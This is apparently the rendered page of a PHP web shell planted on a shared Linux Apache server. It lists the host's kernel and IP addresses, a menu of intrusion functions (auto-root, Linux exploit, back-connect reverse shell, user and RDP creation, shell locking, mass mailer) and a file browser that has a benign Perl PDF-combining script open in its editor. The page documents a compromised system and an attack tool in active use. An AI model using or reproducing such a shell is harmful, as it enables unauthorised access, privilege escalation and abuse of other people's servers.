Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libpdf-api2-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
combine_pdfs.pl
702
B
-rwxr-xr-x
pdf-debug.pl
8.29
KB
-rwxr-xr-x
pdf-deoptimize.pl
2.45
KB
-rw-r--r--
pdf-optimize.pl
1.96
KB
-rw-r--r--
text2pdf.pl
7.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : combine_pdfs.pl
#!/usr/bin/perl use strict; use warnings; use PDF::API2; unless (scalar @ARGV >= 3) { print qq{Usage: $0 <input1.pdf> <input2.pdf> ... <output.pdf> Combine all pages from the input PDF files into a single output PDF file. }; exit; } my $output_file = pop(@ARGV); my $output_pdf = PDF::API2->new(); foreach my $input_file (@ARGV) { print "Loading $input_file:"; my $input_pdf = PDF::API2->open($input_file); foreach my $page_number (1 .. $input_pdf->pages()) { print " $page_number,"; $output_pdf->import_page($input_pdf, $page_number); } $input_pdf->close(); print " Done.\n\n"; } print "Writing $output_file\n"; $output_pdf->save($output_file);
Close